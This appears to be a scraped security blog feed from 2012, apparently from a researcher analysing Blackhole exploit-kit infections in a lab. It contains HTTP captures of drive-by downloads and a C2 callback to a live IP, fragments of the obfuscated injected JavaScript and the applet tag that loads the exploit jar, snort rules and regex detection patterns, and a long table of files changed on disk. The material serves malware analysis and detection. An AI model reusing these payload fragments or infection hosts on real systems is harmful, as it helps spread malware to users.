<span style="font-family: Courier New, Courier, monospace;">Connection: keep-alive</span><br />
<span style="font-family: Courier New, Courier, monospace;">X-Powered-By: PHP/5.3.17-1~dotdeb.0</span><br />
<span style="font-family: Courier New, Courier, monospace;">Pragma: public</span><br />
<span style="font-family: Courier New, Courier, monospace;">Expires: Sun, 07 Oct 2012 12:42:41 GMT</span><br />
<span style="font-family: Courier New, Courier, monospace;">Cache-Control: must-revalidate, post-check=0, pre-check=0</span><br />
<span style="font-family: Courier New, Courier, monospace;">Cache-Control: private</span><br />
<span style="font-family: Courier New, Courier, monospace;"><b>Content-Disposition: attachment; filename="readme.exe"</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"><b>Content-Transfer-Encoding: binary</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">Content-Length: 92160</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">MZ......................@...............................................!..L.!This program cannot be run in DOS mode.</span><br />
<br />
<br />
<span style="font-family: inherit;"><br /></span>
<br />
<h3>
<span style="font-family: inherit; font-size: small;">URL Pattern Analysis:</span></h3>
The most interesting point I could find in my URL analysis of the samples I saw was that they all contained ? 2 to 10 lowercase characters = followed by hexidecimal in 10 character increments, with as many as 70 characters (10, 20 and 70 to be precise). The secondary parameter in the URL is always shorter.<br />
<br />
<span style="font-family: inherit;">I believe there is a good enough pattern for url regex here, once pre-qualified for user agent java or no </span>referrer<span style="font-family: inherit;"> or both. </span><br />
<br />
Generic detection: \.php\?\w{2,10}\=[0-9a-f]{10,70}\&\w{2,10}\=\w.*\&\w{2,10}\=\w<br />
<span style="font-family: inherit;"><br /></span>
<br />
<h3>
<span style="font-family: inherit; font-size: small;">Callback</span></h3>
This particular sample had a <a href="http://stopmalvertising.com/rootkits/analysis-of-cridex.html" target="_blank">cridix-like rootkit</a> callout with what looked like a spyeye sample.On the disk, the file names (again) were <span style="background-color: black; font-family: inherit;"> <b style="line-height: 18px;">wgsdgsdgdsgsd.exe. as well as a KB<randomnumber>.exe.</b></span><br />
<br />
<br />
<pre class="dualColTextStyle" hasbox="2"><span style="font-family: Courier New, Courier, monospace;">POST /mx/5/A/in/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 41.168.5.140:8080
Content-Length: 350
Connection: Keep-Alive
Cache-Control: no-cache</span></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">Generic Detection: \w{2}\/\w.*\/in\/$</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">This user agent is identified in multiple malware samples as post infection activity and the URL string is consistent with Cridex rootkit, while the malware sample was consistent with Spyeye.</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">References:</pre>
<pre class="dualColTextStyle" hasbox="2"><a href="http://lists.emergingthreats.net/pipermail/emerging-sigs/2011-August/015413.html">http://lists.emergingthreats.net/pipermail/emerging-sigs/2011-August/015413.html</a></pre>
<a href="http://malwr.com/analysis/7d663d3f7d93ba2b32d456b861686501/">http://malwr.com/analysis/7d663d3f7d93ba2b32d456b861686501/</a><br />
<a href="http://spamalysis.wordpress.com/2012/03/05/spammed-goo-gl-links/">http://spamalysis.wordpress.com/2012/03/05/spammed-goo-gl-links/</a><br />
<a href="http://www.spamhaus.org/news/article/680/">http://www.spamhaus.org/news/article/680/</a><br />
<a href="http://stopmalvertising.com/rootkits/analysis-of-cridex.html">http://stopmalvertising.com/rootkits/analysis-of-cridex.html</a><br />
<a href="http://fortknoxnetworks.blogspot.com/2012/09/blackhole-disk-artifacts-complete-dump.html">http://fortknoxnetworks.blogspot.com/2012/09/blackhole-disk-artifacts-complete-dump.html</a><br />
<a href="http://fortknoxnetworks.blogspot.com/2012/09/new-fake-av-strain-url-callbacks.html">http://fortknoxnetworks.blogspot.com/2012/09/new-fake-av-strain-url-callbacks.html</a><br />
<a href="http://user-agent-string.info/?Fuas=Mozilla%2F4.0+(Windows+XP+5.1)+Java%2F1.6.0_29&test=7823&action=analyze">http://user-agent-string.info/?Fuas=Mozilla%2F4.0+(Windows+XP+5.1)+Java%2F1.6.0_29&test=7823&action=analyze</a><br />
<span style="background-color: white; color: #009933; font-family: arial, sans-serif; font-size: x-small; line-height: 15px;"><a href="http://blog.fireeye.com/research/2010/06/neosploit_notes.html">http://blog.fireeye.com/research/2010/06/neosploit_notes.html</a></span><br />
<a href="http://wepawet.iseclab.org/view.php?hash=b7cb2a698f35209f9b70eb7361e1162f&type=js">http://wepawet.iseclab.org/view.php?hash=b7cb2a698f35209f9b70eb7361e1162f&type=js</a><br />
<a href="http://jsunpack.jeek.org/?report=b2f98dbcf33f74b9d99b6a6d975f9e4fb26289b5">http://jsunpack.jeek.org/?report=b2f98dbcf33f74b9d99b6a6d975f9e4fb26289b5</a><br />
<br />
<br />
<br />Fort Knox Networkshttp://www.blogger.com/profile/12394479781465013402noreply@blogger.com0tag:blogger.com,1999:blog-407866255126559296.post-82480357136468676192012-09-22T12:08:00.000-07:002012-09-22T12:24:57.350-07:00Blackhole Disk Artifacts - A Complete DumpRecently, I've been concentrating my activities on disk artifacts post-infection. Today, I fired up my lab and infected a system while grabbing as much information as possible.<br />
<br />
<b>Infection Point: </b>hxxp://46.249.59.116/main.php?page=5a56c997ffff2f79<br />
<br />
<b>Date: </b>09/22/2012<br />
<br />
<b>Platform: </b>Windows XP Pro, SP3, unpatched, Java 6 Update 29, Windows Media Player 9, No Adobe Flash, No Adobe Reader, IE 8, Windows Firewall Disabled, No AV.<br />
<br />
<b>Retention: </b>Once this completed I took a full snapshot of the entire disk, to share or analyze further later. If you would like it, just twitter me @fknsec. The snapshot is about 1GB uncompressed.<br />
<br />
<b>Methodology:</b> A snapshot of the entire disk and registry was taken prior to infection and compared against post infection for delta. Wireshark and IE were the only active applications on the system. I used Wireshark, Installrite, VirtualBox, Windows XP and IE8. It should be noted that in the disk capture, Windows Media player did go through its initial startup.<br />
<br />
<div style="text-align: center;">
<span style="font-size: large;">The Infection</span></div>
<br />
First and foremost, I entered the URL into Internet Explorer, where Java launched I was presented with the standard "Please wait while page is loading" in the center of the screen. The first file served up to me was Gam.jar. Response is nginx chunked, nothing unusual here.<br />
<br />
<blockquote class="tr_bq">
<blockquote class="tr_bq">
GET /main.php?page=5a56c997ffff2f79 HTTP/1.1</blockquote>
<blockquote class="tr_bq">
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*</blockquote>
<blockquote class="tr_bq">
Accept-Language: en-us</blockquote>
<blockquote class="tr_bq">
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)</blockquote>
<blockquote class="tr_bq">
Accept-Encoding: gzip, deflate</blockquote>
<blockquote class="tr_bq">
Host: 46.249.59.116</blockquote>
<blockquote class="tr_bq">
Connection: Keep-Alive</blockquote>
<blockquote class="tr_bq">
<br /></blockquote>
<blockquote class="tr_bq">
<br /></blockquote>
<blockquote class="tr_bq">
<br /></blockquote>
<blockquote class="tr_bq">
HTTP/1.1 200 OK</blockquote>
<blockquote class="tr_bq">
Server: nginx</blockquote>
<blockquote class="tr_bq">
Date: Sat, 22 Sep 2012 16:32:10 GMT</blockquote>
<blockquote class="tr_bq">
Content-Type: text/html</blockquote>
<blockquote class="tr_bq">
Transfer-Encoding: chunked</blockquote>
<blockquote class="tr_bq">
Connection: keep-alive</blockquote>
<blockquote class="tr_bq">
X-Powered-By: PHP/5.3.15</blockquote>
<blockquote class="tr_bq">
<br /></blockquote>
<blockquote class="tr_bq">
<br /></blockquote>
<blockquote class="tr_bq">
<br /></blockquote>
<blockquote class="tr_bq">
1fb8</blockquote>
<blockquote class="tr_bq">
<br /></blockquote>
<blockquote class="tr_bq">
<html><body><applet archive="Gam.jar"/code="plugindetecta.plugindetecta"><param name="uid" value=N0b0909041f31312b343c272b3e3c423e3c373734310a3c040b043d2c393e2900373e0235391c /></applet><script>md="a";r="replace";rrr="getAttribute";rr="reverse";</script><b id="b"</blockquote>
</blockquote>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhashLaBKbDPCWGPcG2P3zHNKFfb5yW1CqPLWKP38M5L2eahD9TISEwege5uMDBuspM-UGUaxDBeK_3ScRZizF5u_ZoiQxVxKGplh8BwkOxCUflv0ugJDV7_26CJ8_eeSsxrUgXw0bypJM/s1600/gam.jar.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="186" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhashLaBKbDPCWGPcG2P3zHNKFfb5yW1CqPLWKP38M5L2eahD9TISEwege5uMDBuspM-UGUaxDBeK_3ScRZizF5u_ZoiQxVxKGplh8BwkOxCUflv0ugJDV7_26CJ8_eeSsxrUgXw0bypJM/s320/gam.jar.png" width="320" /></a></div>
Searching on the opening offset:0 of the response, I come up with 313 hits in google, mostly from jsunpack, including some variations like this (with a missing "/" after Gam.jar":<br />
<blockquote class="tr_bq">
<html><body><applet archive="Gam.jar" code="importantThinga.importantThinga"></blockquote>
<a href="http://jsunpack.jeek.org/dec/go?report=cecd770436c23a953511f66befcc12da8cbeb7cb">http://jsunpack.jeek.org/dec/go?report=cecd770436c23a953511f66befcc12da8cbeb7cb</a><br />
<br />
Additionally, some of the entries noted come back with the <script>abre variant with is all too common with SQL injected Wordpress pages.<br />
<blockquote class="tr_bq">
<script>try{awebw++;}catch(awtbawt){try{nta23t|15232}catch(tabsd){m=Math;ev=window[""+"e"+"val"];</blockquote>
<a href="http://jsunpack.jeek.org/dec/go?report=71f9a841aeebe2944633c46950f9848a4a8c8bb6">http://jsunpack.jeek.org/dec/go?report=71f9a841aeebe2944633c46950f9848a4a8c8bb6</a>
<br />
<br />
I am currently aware of approximately 1,600+ Wordpress sites which are currently infected with this script. Some of these triggered AVG's online shield<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj15-oNxEQBFWFz8lit8Dmh0oLdOYQs9rjJryFXkchSxH1qJ0wPMpND9J77oVaWW6qRGgSex1qu1pK6kh5BKsHproOWhd3Zx4o8p2ZRjmrM87FrPyyTyWSMo6a_05SwHi8-DA4MrYG2KD8/s1600/avg-online-shield-detection.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="104" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj15-oNxEQBFWFz8lit8Dmh0oLdOYQs9rjJryFXkchSxH1qJ0wPMpND9J77oVaWW6qRGgSex1qu1pK6kh5BKsHproOWhd3Zx4o8p2ZRjmrM87FrPyyTyWSMo6a_05SwHi8-DA4MrYG2KD8/s320/avg-online-shield-detection.PNG" width="320" /></a></div>
<br />
<br />
Next, Windows Media player was launched with the file name<b> hcp_asx</b>. I found it interesting that this version of blackhole hit Windows Media player for exploit before any other available exploits on the system. Not going to get into this because some analysis already exists <a href="http://blog.webroot.com/2011/11/11/this-blackhole-exploit-kit-gives-you-windows-media-player-and-a-whole-lot-more/" target="_blank">here</a> and those of you using snort are likely familiar with this rule:<br />
<br />
<span style="background-color: black; color: white;"><span style="font-family: monospace; font-size: 13px; line-height: 18px;">emerging-current_events.rules:alert tcp $HOME_NET any -> $EXTERNAL_NET</span><br style="font-family: monospace; font-size: 13px; line-height: 18px;" /><span style="font-family: monospace; font-size: 13px; line-height: 18px;">$HTTP_PORTS (msg:"ET CURRENT_EVENTS Blackhole Exploit Pack HCP ovflow Media</span><br style="font-family: monospace; font-size: 13px; line-height: 18px;" /><span style="font-family: monospace; font-size: 13px; line-height: 18px;">Player lt 10"; flow:established,to_server; content:"/hcp_asx.php?f=";</span><br style="font-family: monospace; font-size: 13px; line-height: 18px;" /><span style="font-family: monospace; font-size: 13px; line-height: 18px;">http_uri; pcre:"/hcp_asx\.php\?f=\d+$/U"; classtype:trojan-activity;</span><br style="font-family: monospace; font-size: 13px; line-height: 18px;" /><span style="font-family: monospace; font-size: 13px; line-height: 18px;">sid:2013077; rev:1;)</span></span>
<br />
<br />
So the system was compromised by blackhole and a bunch of stuff happened. Let's look at what happens on the disk. The binary was delivered HTTP attachment.<br />
<br />
<br />
<blockquote class="tr_bq">
GET /w.php?f=97d19&e=0 HTTP/1.1<br />
User-Agent: Java/1.6.0_29<br />
Host: 46.249.59.116<br />
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2<br />
Connection: keep-alive<br />
<br />
<br />
HTTP/1.1 200 OK<br />
Server: nginx<br />
Date: Sat, 22 Sep 2012 16:32:21 GMT<br />
Content-Type: application/x-msdownload<br />
Connection: keep-alive<br />
X-Powered-By: PHP/5.3.15<br />
Pragma: public<br />
Expires: Sat, 22 Sep 2012 16:32:21 GMT<br />
Cache-Control: must-revalidate, post-check=0, pre-check=0<br />
Cache-Control: private<br />
Content-Disposition: attachment; filename="about.exe"<br />
Content-Transfer-Encoding: binary<br />
Content-Length: 288615<br />
<br />
<br />
MZ......................@...............................................!..L.!This program cannot be run in DOS mode.</blockquote>
<br />
No callouts were observed.<br />
<div style="text-align: center;">
<span style="font-size: large;">What Happened on The Disk</span></div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
The creation of<b> v.class</b> by the root process java as well as the downloader<b>wgsdgsdgdsgsd.exe</b> in the users temp folder is consistent with most of the activity I have been analyzing lately.</div>
<br />
A full list here is included of all the files created, edited (size changes) and deleted from the system, as well as all registry entries.<br />
<span style="background-color: black;"><span style="color: white;"><br /></span></span>
I was well aware of hsperfdata_%username% as a disk artifact, not necessarily of infection, but as an indicator that java had executed at a specific time/date stamp. There were a series of cache folders and files that were also created under....<br />
<b><br /></b>
<b>documents and settings\%username%\Application Data\Sun\Java\Deployment\cache\6.0</b><br />
<br />
<b><br /></b>
Anywho... here is a dump of all the delta from the disk Admittedly some of this is the result of normal operations, however, I believe there is some good information on disk artifacts including the hsperfdata and the java cache information.<br />
<br />
<br />
<br />
<b>backhole1 - All Files</b><br />
<br />
<table border="1" cellpadding="2" cellspacing="0" style="width: 100%px;">
<tbody>
<tr>
<th align="left" bgcolor="#00007F"><span style="color: white; font-size: xx-small;">FileName</span></th>
<th align="right" bgcolor="#00007F"><span style="color: white; font-size: xx-small;">Size Before</span></th>
<th align="right" bgcolor="#00007F"><span style="color: white; font-size: xx-small;">Size After</span></th>
<th align="left" bgcolor="#00007F"><span style="color: white; font-size: xx-small;">Attrib Before</span></th>
<th align="left" bgcolor="#00007F"><span style="color: white; font-size: xx-small;">Attrib After</span></th>
<th align="left" bgcolor="#00007F"><span style="color: white; font-size: xx-small;">Date Before</span></th>
<th align="left" bgcolor="#00007F"><span style="color: white; font-size: xx-small;">Date After</span></th>
<th align="left" bgcolor="#00007F"><span style="color: white; font-size: xx-small;">Version Before</span></th>
<th align="left" bgcolor="#00007F"><span style="color: white; font-size: xx-small;">Version After</span></th>
<th align="left" bgcolor="#00007F"><span style="color: white; font-size: xx-small;">CRC Before</span></th>
<th align="left" bgcolor="#00007F"><span style="color: white; font-size: xx-small;">CRC After</span></th>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Cesy</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Cesy\aqowe.ydb</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">2KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:34:00 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Feuw</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Feuw\myzyn.exe</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">289KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:30 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Riafew</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Riafew\xiryq.quy</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:30 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Wireshark</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Wireshark\dfilters</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:32:39 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Microsoft\Address Book</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Microsoft\Address Book\bomber.wab</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">177KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:40 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Microsoft\Address Book\bomber.wab~</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">177KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:31:40 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Microsoft\Crypto\RSA\S-1-5-21-484763869-706699826-1060284298-1003\6b29ae44e85efac3c72ff4d1865d73f1_72b2dab9-a324-4085-acf9-f7c87e24dedd</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">SA</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:30:18 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Microsoft\Internet Explorer\Quick Launch\Windows Media Player.lnk</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:33:46 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Microsoft\Media Player\0009236B.wpl</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:34:04 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\0</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\1</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\10</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\11</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\12</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\13</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\14</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\15</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\16</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\17</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\18</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\19</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\2</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\20</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\21</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\22</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\23</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\24</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\Documents and Settings\bomber\Application Data\Sun\Java\Deployment\cache\6.0\25</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">D</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
